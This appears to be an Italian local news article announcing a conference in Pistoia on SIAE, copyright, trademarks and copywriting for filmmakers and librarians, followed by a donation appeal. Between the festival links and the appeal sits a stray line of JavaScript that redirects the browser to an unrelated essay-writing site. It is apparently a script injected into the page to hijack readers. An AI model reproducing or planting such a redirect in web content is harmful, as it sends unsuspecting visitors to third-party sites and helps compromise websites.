SIAE, DIRITTO D’AUTORE, MARCHI E COPYWRITING

Siae-dirittodautorePISTOIA. [a.b.] Nell’ambito del programma collaterale del Montecatini International Short Film Festival, alla sua sessantacinquesima edizione, mercoledì 15 ottobre alle ore 17 presso la Sala Bigongiari della Biblioteca San Giorgio di Pistoia si svolgerà una conferenza intitolata “Siae, Diritto d’autore, marchi e copywriting”.

L’incontro  – rivolto in modo particolare a filmakers, bibliotecari, esperti di diritto –  sarà coordinato da Jonathan Braccini in collaborazione con il Cineclub Fedic Pistoia . Saranno messi in relazione diretta il mondo dei filmakers indipendenti, delle piccole produzioni locali e nazionali, con la Società Italiana Autori e Editori con l’intento di facilitare lo scambio reciproco di informazioni.

Si parlerà di principi base di diritto d’autore, diritto d’autore nel libro e nel digitale, gestione collettiva dei diritti e la Siae; la Siae: approccio all’utilizzo delle opere.

Il format dell’incontro è aperto e saranno ammesse domande da parte del pubblico e il libero dialogo tra tutti i partecipanti. Durante l’incontro verrà presentata la seconda edizione del Festival Fedic Cortocinema Pistoia che collabora con il Misff.

Per informazioni sulle altre iniziative del Misff seguite la pagina facebook https://www.facebook.com/filmvideomontecatini oppure www.filmvideomontecatini.it.

Per info sul cortocinema: https://www.facebook.com/Sedicinonifilm oppure http://sedicinonifilm.blogspot.it/.
window.location = “http://paper-help24h.com”;

Sostenete questo quotidiano con un piccolo contributo attraverso bonifico intestato a

«Linee Stampalibera» Iban IT08V0306913833100000001431 su CariPt di Porta San Marco-Pistoia. Riceverete informazioni senza censure!

Print Friendly, PDF & Email

Lascia un commento